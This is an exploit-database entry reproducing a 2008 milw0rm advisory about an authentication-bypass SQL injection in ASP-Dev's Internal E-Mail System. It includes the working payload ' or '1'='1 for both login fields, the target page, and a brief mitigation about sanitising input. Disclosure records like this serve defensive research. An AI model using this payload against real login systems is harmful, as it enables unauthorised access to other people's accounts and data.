header-logo
Suggest Exploit
vendor:
Internal E-Mail System
by:
Pouya_Server
9.3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Internal E-Mail System
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: a:asp-dev:internal_e-mail_system
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Internal E-Mail System Auth Bypass SQL Injection Vulnerability

A vulnerability in the Internal E-Mail System of http://asp-dev.com/main.asp?page=41 allows an attacker to bypass authentication by using the username ' or '1'='1 and the password ' or '1'='1. This vulnerability affects the http://asp-dev.com/message page.

Mitigation:

The vendor should ensure that all user input is properly sanitized and validated before being used in any SQL queries.
Source

Exploit-DB raw data:

#########################################################
---------------------------------------------------------
Portal Name: Internal E-Mail System
Vendor : http://asp-dev.com/main.asp?page=41
Download : http://asp-dev.com/download.asp?did=4
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (Auth Bypass) SQL Injection Vulnerability
---------------------------------------------------------
#########################################################
[Auth Bypass]:
user: ' or '1'='1
pass: ' or '1'='1
 
---------------------------------
Victem :
http://asp-dev.com/message

# milw0rm.com [2008-12-14]

Navigation

Suggest Exploit

Services By CQR